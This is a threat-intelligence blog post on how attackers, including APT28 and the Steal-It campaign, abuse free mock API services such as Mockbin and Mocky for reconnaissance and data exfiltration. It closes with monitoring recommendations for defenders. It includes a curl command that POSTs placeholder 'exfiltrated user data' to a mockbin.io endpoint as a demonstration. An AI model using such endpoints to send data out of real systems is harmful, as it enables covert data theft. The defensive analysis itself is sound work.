Introduction
The internet of 2024 is laden with cheap and simple tools to aid with countless development tasks. With great numbers of free and accessible tools comes a great risk of exploitation by bad actors. Over the past few months, fake/mock API services have risen in prominence within this problem space. Their appearance within state-sponsored APT campaigns was observed by CERT-UA in connection to the ongoing Russia-Ukraine War, signaling threat actor tradecraft that may have been long exploited before appearing in the spotlight. Forecasting increased use of this tool for nefarious ends, being able to separate legitimate use from abuse is necessary for handling potential incidents.
Why Use Mock APIs?
Mock API services emerged as a tool for web developers to simulate API endpoints for testing/debugging purposes. When properly implemented, being able to emulate backend environments allows for quick and consistent feedback to ensure bugs are swiftly caught and fixed. This also alleviates the strain of testing large and intricate systems by simulating only the necessary endpoints for the API calls in-scope for testing. Backend and UI elements that rely on the same API endpoint can be tested and developed in parallel assuming the mock environment is configured as close to parity with production as possible. Depending on the chosen service users can generate their own HTTP responses, deliver and receive text-based payloads, and inspect/monitor traffic to/from the established endpoints. Some services like Mocky.io don’t require user registration and allow mocks to be managed by secret tokens or specified names. This adds another hurdle for defenders and law enforcement seeking to curb malicious use. All of these capabilities are handy for attackers looking to set up campaign infrastructure quickly, for little to no cost, and with a degree of anonymity.
Mockbin.io
To demonstrate the ease of setup and use of mocks, let’s start with something simple using mockbin.io. Here we can specify our own HTTP response code, headers, and body content. For simplicity’s sake, we’ll use the defaults for our mock.
This takes us to a management page that logs requests to the endpoint.
As this tool is free, open source and doesn’t rely on users signing up; mocks and related data are stored within local browser storage. Opening the link to the mock using a browser logs a GET request and displays our message in the browser window as expected.
$ curl -X POST -H "Content-Type: text/html" -d 'exfiltrated user data goes here' https://14c47ec4faef4c1f8006f83439e144e0.api.mockbin.io/ { "message": "Hello World"Back on our management window, the request we sent is logged and the data is displayed for that request.
This provides an avenue for data exfiltration used by attackers in previously seen campaigns. Less sophisticated actors may use this simply as a check to confirm that previous stages were delivered and executed successfully.
Mocks in the Cyber-criminal Toolkit
The early stages of a campaign featuring mock API use involve initial access files pointing targeted machines towards the provisioned endpoint providing reconnaissance data on the infected hosts. APT28 was observed leveraging LNK files delivered via email attachment to execute scripts that would lead to interaction with their mock hosted on Mocky. This can be done via a headless browser, supported by many popular browser applications including Google Chrome, decreasing the likelihood that API interactions will be noticed by the common user. Armed with gathered data like the operating system and external IP address, the attacker can seamlessly dispatch customized payloads to targets as needed, utilizing a service that appears less suspicious than typical HTTP traffic to/from threat actor C2 servers. This is particularly potent in environments where developers frequently employ mock API services as part of their workflows. In the Steal-It campaign reported by Zscaler, two mock API services were used within an infection chain. Mocky.io to validate OS and IP location, downloading an LNK to advance the threat sequence if the correct OS and location are returned. Mockbin.org is used to provide the endpoint for exfiltrated data.
In Closing
Nearly any general-purpose tool can and will eventually be used for nefarious ends. As developers would use mock APIs to cut down testing and development time, threat actors also benefit from time saved standing up resources necessary to execute a campaign. While defenders can’t hope to thwart every new advantage gained by attackers, early detection and awareness isn’t a bad consolation prize. With proper detection of critical stages of an attack before payload execution, high-impact threats can be disrupted and data loss prevented. This is especially true for intricate campaigns with several moving parts where a single failure stops it dead in its tracks.
Recommendations:
– Monitor traffic to popular/known mock API services, the following were previously mentioned:
- – Mockbin.io
– Free and open source
– Created in response to mockbin.org switching to a paid structure - – Mocky.io
– Free and open source
– APT28 utilized - – Insomnia (formerly mockbin.org)
– Requires registration
– APT28 utilized (former free version
References
